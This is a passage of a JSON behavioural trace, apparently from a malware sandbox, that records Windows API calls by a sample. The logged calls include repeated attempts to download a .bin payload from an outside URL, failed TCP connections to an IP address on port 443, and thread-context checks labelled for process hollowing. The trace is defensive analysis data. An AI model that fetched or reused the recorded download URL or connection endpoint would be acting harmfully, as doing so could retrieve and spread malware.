[ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "ThreadInformationClass", "value": "12" }, { "name": "ThreadInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "ThreadId", "value": "6820" } ], "repeated": 0, "id": 1773 }, { "timestamp": "2025-02-27 23:36:35,909", "thread_id": "6820", "caller": "0x764e254a", "parentcaller": "0x76f69834", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003dc" } ], "repeated": 0, "id": 1774 }, { "timestamp": "2025-02-27 23:36:35,909", "thread_id": "6820", "caller": "0x764e254a", "parentcaller": "0x76f698b6", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003d0" } ], "repeated": 0, "id": 1775 }, { "timestamp": "2025-02-27 23:36:35,909", "thread_id": "6820", "caller": "0x771bbd19", "parentcaller": "0x7718616c", "category": "threading", "api": "NtTerminateThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0x00000000" }, { "name": "ExitStatus", "value": "0x00000000" }, { "name": "ThreadId", "value": "0" }, { "name": "ProcessId", "value": "0" } ], "repeated": 0, "id": 1776 }, { "timestamp": "2025-02-27 23:36:36,644", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 4, "id": 1777 }, { "timestamp": "2025-02-27 23:36:36,644", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc0090", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1778 }, { "timestamp": "2025-02-27 23:36:36,644", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1779 }, { "timestamp": "2025-02-27 23:36:36,644", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc0090" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1780 }, { "timestamp": "2025-02-27 23:36:36,644", "thread_id": "11160", "caller": "0x72dabb71", "parentcaller": "0x72e00454", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 27, "id": 1781 }, { "timestamp": "2025-02-27 23:36:36,644", "thread_id": "11160", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x000003ac", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "940" } ], "repeated": 0, "id": 1782 }, { "timestamp": "2025-02-27 23:36:36,644", "thread_id": "11160", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000003ac" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1783 }, { "timestamp": "2025-02-27 23:36:36,644", "thread_id": "11160", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000003ac" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00\\x98\\xa7t\\x00" } ], "repeated": 0, "id": 1784 }, { "timestamp": "2025-02-27 23:36:36,644", "thread_id": "11160", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "940" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1785 }, { "timestamp": "2025-02-27 23:36:36,644", "thread_id": "11160", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000003ac" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\x280\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1786 }, { "timestamp": "2025-02-27 23:36:36,644", "thread_id": "11160", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "940" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1787 }, { "timestamp": "2025-02-27 23:36:36,644", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000003ac" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2,\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1788 }, { "timestamp": "2025-02-27 23:36:36,644", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000003ac" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2,\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1789 }, { "timestamp": "2025-02-27 23:36:36,644", "thread_id": "11160", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "940" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1790 }, { "timestamp": "2025-02-27 23:36:36,644", "thread_id": "11160", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "940" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1791 }, { "timestamp": "2025-02-27 23:36:38,691", "thread_id": "11160", "caller": "0x72dbaed3", "parentcaller": "0x76512043", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 3, "id": 1792 }, { "timestamp": "2025-02-27 23:36:38,691", "thread_id": "11160", "caller": "0x72de96b2", "parentcaller": "0x72d8ee02", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "940" } ], "repeated": 0, "id": 1793 }, { "timestamp": "2025-02-27 23:36:38,691", "thread_id": "11160", "caller": "0x72e2c03a", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 7, "id": 1794 }, { "timestamp": "2025-02-27 23:36:38,691", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc0090" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1795 }, { "timestamp": "2025-02-27 23:36:38,691", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1796 }, { "timestamp": "2025-02-27 23:36:39,706", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 4, "id": 1797 }, { "timestamp": "2025-02-27 23:36:39,706", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc0094", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1798 }, { "timestamp": "2025-02-27 23:36:39,706", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1799 }, { "timestamp": "2025-02-27 23:36:39,706", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc0094" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1800 }, { "timestamp": "2025-02-27 23:36:39,706", "thread_id": "11036", "caller": "0x764e2689", "parentcaller": "0x73cbcb7a", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000528" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 0, "id": 1801 }, { "timestamp": "2025-02-27 23:36:39,706", "thread_id": "11036", "caller": "0x77182676", "parentcaller": "0x77182010", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000518" } ], "repeated": 0, "id": 1802 }, { "timestamp": "2025-02-27 23:36:39,706", "thread_id": "11036", "caller": "0x77182676", "parentcaller": "0x77182010", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000524" } ], "repeated": 0, "id": 1803 }, { "timestamp": "2025-02-27 23:36:39,706", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 2, "id": 1804 }, { "timestamp": "2025-02-27 23:36:39,706", "thread_id": "11036", "caller": "0x764e254a", "parentcaller": "0x73d0512a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000051c" } ], "repeated": 0, "id": 1805 }, { "timestamp": "2025-02-27 23:36:39,706", "thread_id": "11036", "caller": "0x764e254a", "parentcaller": "0x73cc2629", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003a8" } ], "repeated": 0, "id": 1806 }, { "timestamp": "2025-02-27 23:36:39,706", "thread_id": "11036", "caller": "0x764e254a", "parentcaller": "0x73d0517f", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000528" } ], "repeated": 0, "id": 1807 }, { "timestamp": "2025-02-27 23:36:39,706", "thread_id": "11036", "caller": "0x77182676", "parentcaller": "0x77186a76", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000052c" } ], "repeated": 0, "id": 1808 }, { "timestamp": "2025-02-27 23:36:39,706", "thread_id": "11036", "caller": "0x72dd2ae3", "parentcaller": "0x72dcc4b5", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 25, "id": 1809 }, { "timestamp": "2025-02-27 23:36:39,706", "thread_id": "11036", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x0000052c", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1324" } ], "repeated": 0, "id": 1810 }, { "timestamp": "2025-02-27 23:36:39,706", "thread_id": "11036", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000052c" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1811 }, { "timestamp": "2025-02-27 23:36:39,706", "thread_id": "11036", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000052c" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00P8q\\x00" } ], "repeated": 0, "id": 1812 }, { "timestamp": "2025-02-27 23:36:39,706", "thread_id": "11036", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1324" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1813 }, { "timestamp": "2025-02-27 23:36:39,706", "thread_id": "11036", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000052c" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\x281\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1814 }, { "timestamp": "2025-02-27 23:36:39,706", "thread_id": "11036", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1324" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1815 }, { "timestamp": "2025-02-27 23:36:39,706", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000052c" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2<\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1816 }, { "timestamp": "2025-02-27 23:36:39,706", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000052c" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2<\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1817 }, { "timestamp": "2025-02-27 23:36:39,706", "thread_id": "11036", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1324" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1818 }, { "timestamp": "2025-02-27 23:36:39,706", "thread_id": "11036", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1324" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1819 }, { "timestamp": "2025-02-27 23:36:43,722", "thread_id": "11160", "caller": "0x72de96b2", "parentcaller": "0x72ec3a14", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1324" } ], "repeated": 0, "id": 1820 }, { "timestamp": "2025-02-27 23:36:43,722", "thread_id": "11036", "caller": "0x72e59ac9", "parentcaller": "0x72ddc292", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 8, "id": 1821 }, { "timestamp": "2025-02-27 23:36:43,722", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc0094" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1822 }, { "timestamp": "2025-02-27 23:36:43,722", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1823 }, { "timestamp": "2025-02-27 23:36:44,737", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 4, "id": 1824 }, { "timestamp": "2025-02-27 23:36:44,737", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc0098", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1825 }, { "timestamp": "2025-02-27 23:36:44,737", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1826 }, { "timestamp": "2025-02-27 23:36:44,737", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc0098" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1827 }, { "timestamp": "2025-02-27 23:36:44,737", "thread_id": "11036", "caller": "0x72dabb71", "parentcaller": "0x72e00454", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 27, "id": 1828 }, { "timestamp": "2025-02-27 23:36:44,737", "thread_id": "11036", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x00000528", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1320" } ], "repeated": 0, "id": 1829 }, { "timestamp": "2025-02-27 23:36:44,737", "thread_id": "11036", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000528" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1830 }, { "timestamp": "2025-02-27 23:36:44,737", "thread_id": "11036", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000528" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00\\x98\\xa7t\\x00" } ], "repeated": 0, "id": 1831 }, { "timestamp": "2025-02-27 23:36:44,737", "thread_id": "11036", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1320" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1832 }, { "timestamp": "2025-02-27 23:36:44,737", "thread_id": "11036", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000528" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\x282\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1833 }, { "timestamp": "2025-02-27 23:36:44,737", "thread_id": "11036", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1320" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1834 }, { "timestamp": "2025-02-27 23:36:44,737", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000528" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2<\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1835 }, { "timestamp": "2025-02-27 23:36:44,737", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000528" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2<\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1836 }, { "timestamp": "2025-02-27 23:36:44,737", "thread_id": "11036", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1320" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1837 }, { "timestamp": "2025-02-27 23:36:44,737", "thread_id": "11036", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1320" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1838 }, { "timestamp": "2025-02-27 23:36:46,784", "thread_id": "11036", "caller": "0x72dbaed3", "parentcaller": "0x76512043", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 3, "id": 1839 }, { "timestamp": "2025-02-27 23:36:46,784", "thread_id": "11036", "caller": "0x72de96b2", "parentcaller": "0x72d8ee02", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1320" } ], "repeated": 0, "id": 1840 }, { "timestamp": "2025-02-27 23:36:46,784", "thread_id": "11036", "caller": "0x72e2c03a", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 7, "id": 1841 }, { "timestamp": "2025-02-27 23:36:46,784", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc0098" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1842 }, { "timestamp": "2025-02-27 23:36:46,784", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1843 }, { "timestamp": "2025-02-27 23:36:47,800", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 4, "id": 1844 }, { "timestamp": "2025-02-27 23:36:47,800", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc009c", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1845 }, { "timestamp": "2025-02-27 23:36:47,800", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1846 }, { "timestamp": "2025-02-27 23:36:47,800", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc009c" }, { 